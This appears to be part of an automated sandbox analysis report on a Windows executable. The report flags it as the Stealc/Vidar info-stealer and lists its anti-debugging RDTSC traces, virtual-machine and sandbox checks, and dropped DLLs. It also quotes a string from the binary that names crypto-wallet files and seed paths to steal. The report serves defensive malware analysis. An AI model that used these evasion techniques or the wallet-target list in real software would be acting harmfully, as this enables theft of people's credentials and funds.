Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70344 second address: 4D7034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7034A second address: 4D7034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7034E second address: 4D703D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F06D8518559h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov eax, 55ED7F73h 0x00000018 call 00007F06D8518558h 0x0000001d movzx esi, bx 0x00000020 pop edi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F06D8518555h 0x0000002c sbb ch, 00000016h 0x0000002f jmp 00007F06D8518551h 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 mov edx, eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D703D9 second address: 4D703EE instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06D8B4D9CBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7047C second address: 4D704FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D851854Fh 0x00000009 sub eax, 4A665E7Eh 0x0000000f jmp 00007F06D8518559h 0x00000014 popfd 0x00000015 mov dh, ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push F74EBB96h 0x0000001f pushad 0x00000020 mov bx, si 0x00000023 push ecx 0x00000024 mov eax, edi 0x00000026 pop ebx 0x00000027 popad 0x00000028 add dword ptr [esp], 7D976092h 0x0000002f jmp 00007F06D8518558h 0x00000034 call 00007F074859C057h 0x00000039 push 74DF27D0h 0x0000003e push dword ptr fs:[00000000h] 0x00000045 mov eax, dword ptr [esp+10h] 0x00000049 mov dword ptr [esp+10h], ebp 0x0000004d lea ebp, dword ptr [esp+10h] 0x00000051 sub esp, eax 0x00000053 push ebx 0x00000054 push esi 0x00000055 push edi 0x00000056 mov eax, dword ptr [74E80140h] 0x0000005b xor dword ptr [ebp-04h], eax 0x0000005e xor eax, ebp 0x00000060 push eax 0x00000061 mov dword ptr [ebp-18h], esp 0x00000064 push dword ptr [ebp-08h] 0x00000067 mov eax, dword ptr [ebp-04h] 0x0000006a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000071 mov dword ptr [ebp-08h], eax 0x00000074 lea eax, dword ptr [ebp-10h] 0x00000077 mov dword ptr fs:[00000000h], eax 0x0000007d ret 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F06D8518557h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D704FF second address: 4D70537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F06D8B4D9CEh 0x00000012 mov edx, dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70537 second address: 4D7053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7053D second address: 4D70565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F06D8B4D9CAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70565 second address: 4D70574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70574 second address: 4D7058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7058C second address: 4D705B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edx] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F06D8518558h 0x00000012 pop eax 0x00000013 mov cl, bl 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D705B5 second address: 4D7060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F06D8B4D9CCh 0x00000011 sub ecx, 656E8948h 0x00000017 jmp 00007F06D8B4D9CBh 0x0000001c popfd 0x0000001d mov dl, cl 0x0000001f popad 0x00000020 test al, al 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007F06D8B4D9CAh 0x0000002d and esi, 66884BA8h 0x00000033 jmp 00007F06D8B4D9CBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7060F second address: 4D70627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70627 second address: 4D705B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F06D8B4D91Ch 0x00000011 mov al, byte ptr [edx] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F06D8B4D9D8h 0x0000001b pop eax 0x0000001c mov cl, bl 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70670 second address: 4D70683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70683 second address: 4D706FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F06D8B4D9CCh 0x00000011 sub cx, 3858h 0x00000016 jmp 00007F06D8B4D9CBh 0x0000001b popfd 0x0000001c call 00007F06D8B4D9D8h 0x00000021 mov esi, 09FE2891h 0x00000026 pop ecx 0x00000027 popad 0x00000028 lea ebx, dword ptr [edi+01h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F06D8B4D9D8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D706FC second address: 4D70712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70712 second address: 4D7072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 mov bl, cl 0x00000008 pop ebx 0x00000009 popad 0x0000000a inc edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F06D8B4D9CCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7072D second address: 4D7073C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7073C second address: 4D707D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D8B4D9CFh 0x00000009 add cl, FFFFFFEEh 0x0000000c jmp 00007F06D8B4D9D9h 0x00000011 popfd 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test al, al 0x00000019 jmp 00007F06D8B4D9CAh 0x0000001e jne 00007F0748BC5CC8h 0x00000024 jmp 00007F06D8B4D9D0h 0x00000029 mov ecx, edx 0x0000002b jmp 00007F06D8B4D9D0h 0x00000030 shr ecx, 02h 0x00000033 jmp 00007F06D8B4D9D0h 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c rep movsd 0x0000003e rep movsd 0x00000040 rep movsd 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F06D8B4D9D7h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D707D3 second address: 4D707D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D707D9 second address: 4D707DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D707DD second address: 4D707F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ecx, 11246AA5h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D707F2 second address: 4D70804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70804 second address: 4D70836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 03h 0x0000000e jmp 00007F06D8518556h 0x00000013 rep movsb 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70836 second address: 4D7083C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7083C second address: 4D70861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70861 second address: 4D70865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70865 second address: 4D70869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70869 second address: 4D7086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7086F second address: 4D70875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70875 second address: 4D70879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70879 second address: 4D708C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, ebx 0x0000000a pushad 0x0000000b mov ch, 20h 0x0000000d pushfd 0x0000000e jmp 00007F06D8518555h 0x00000013 adc esi, 5290EDC6h 0x00000019 jmp 00007F06D8518551h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ecx, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F06D851854Dh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D708C7 second address: 4D708F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D7h 0x00000008 mov bh, cl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr fs:[00000000h], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D708F3 second address: 4D708F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D708F9 second address: 4D70944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06D8B4D9D5h 0x00000009 or esi, 663F09E6h 0x0000000f jmp 00007F06D8B4D9D1h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F06D8B4D9CCh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70944 second address: 4D7094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7094A second address: 4D7094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D7094E second address: 4D7047C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov ax, dx 0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 pop ebx 0x00000011 pushad 0x00000012 mov edi, 28760A7Eh 0x00000017 mov al, dh 0x00000019 popad 0x0000001a leave 0x0000001b jmp 00007F06D851854Eh 0x00000020 retn 0008h 0x00000023 cmp dword ptr [ebp-2Ch], 10h 0x00000027 mov eax, dword ptr [ebp-40h] 0x0000002a jnc 00007F06D8518545h 0x0000002c push eax 0x0000002d lea edx, dword ptr [ebp-00000590h] 0x00000033 push edx 0x00000034 call esi 0x00000036 push 00000008h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F06D8518557h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 4D70A30 second address: 4D70A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 64CAh 0x00000007 mov ebx, 0DE50396h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F06D8B4D9D3h 0x00000017 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\random(1).exe Special instruction interceptor: First address: ECF924 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(1).exe Special instruction interceptor: First address: 110955D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\random(1).exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random(1).exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\random(1).exe TID: 7636 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C59EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 0_2_6C59EBF0
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: random(1).exe, random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: random(1).exe, 00000000.00000002.2013235084.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: random(1).exe, 00000000.00000002.2013235084.000000000089E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\random(1).exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\random(1).exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\random(1).exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\random(1).exe File opened: NTICE
Source: C:\Users\user\Desktop\random(1).exe File opened: SICE
Source: C:\Users\user\Desktop\random(1).exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\random(1).exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C66AC62
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C66AC62
Source: C:\Users\user\Desktop\random(1).exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C6B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6C6B4760
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C591C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 0_2_6C591C30
Source: random(1).exe, random(1).exe, 00000000.00000002.2013637925.0000000001058000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: QProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C66AE71 cpuid 0_2_6C66AE71
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\random(1).exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\random(1).exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C66A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6C66A8DC
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5B8390 NSS_GetVersion, 0_2_6C5B8390

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
